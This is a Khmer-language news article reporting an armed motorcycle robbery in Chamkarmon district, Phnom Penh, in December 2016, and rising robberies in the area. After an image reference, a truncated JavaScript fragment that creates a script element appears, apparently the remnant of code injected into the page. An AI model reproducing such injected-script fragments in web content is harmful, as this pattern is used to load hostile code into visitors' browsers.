Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

គំរាមបាញ់ប្លន់សម្លាប់ យកម៉ូតូ ZoomerXមួយគ្រឿង ដោយសុវត្ថិភាព នៅទឹកដីចំការមន

ភ្នំពេញ ៖ តាមសេក្តីរាយការណ៍មកថា នៅវេលាម៉ោង២២និង៣០នាទី យប់ថ្ងៃទី០២ ខែធ្នូ ឆ្នាំ២០១៦ នៅតាម បណ្ដោយ ផ្លូវលេខ 348 ក្នុងសង្កាត់ទួលស្វាយព្រៃ១ ខណ្ឌចំការមន រាជធានីភ្នំពេញ មានករណី គំរាមបាញ់ប្លន់សម្លាប់ យកម៉ូតូ ZoomerXមួយគ្រឿង ដោយសុវត្ថិភាពទៀតហើយ។

ប្រភពពីជនរងគ្រោះបានប្រាប់ថា មុនពេលកើតហេតុគាត់បានជិះម៉ូតូតែម្នាក់ឯង នៅចំនុចកើតហេតុខាងលើ ស្រាប់តែមានក្រុម ជនសង្ស័យមួយក្រុមមានគ្នា៤នាក់ធ្វើសកម្មភាព គៀរម៉ូតូរបស់ខ្លួនអោយដួល ហើយគំរាមបាញ់សម្លាប់ និងបានជិះយកម៉ូតូរបស់ ខ្លួនទៅបាត់។
ក្រោយកើតហេតុ ជនរងគ្រោះបានត្រឹមទៅដាក់ពាក្យបណ្តឹងនៅប៉ុស្តិ៍រដ្ឋបាលសង្កាត់ទួលស្វាយព្រៃដើម្បីអោយសមត្ថកិច្ចជួយ អន្តរាគមន៍។

គួរកត់សម្គាល់ដែរថា មួយរយៈកន្លងទៅនេះអំពើប្លន់នៅក្នុងរាជធានីភ្នំពេញហាក់មានការស្ងប់ស្ងាត់បន្តិចមែន ប៉ុន្តែថ្មីៗនេះបែរជាផ្ទុះនូវសកម្មភាពប្លន់ស្ទើគ្មានសល់មួយយប់សោះជាពិសេស នៅទឹកដីខណ្ឌចំការមនតែម្តង សកម្មភាពប្លន់មានគ្រប់រូបភាព មាន ទាំងកាំភ្លើង និងឧបករណ៍ផ្សេងៗ ដែលធ្វើអោ ប្រជាពលរដ្ឋឲ្យមានការព្រួយបារម្ភយ៉ាងខ្លាំងអំពីសុវត្ថិភាព និងសន្តិសុខក្នុងមូល ដ្ឋាន។

img_4856var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More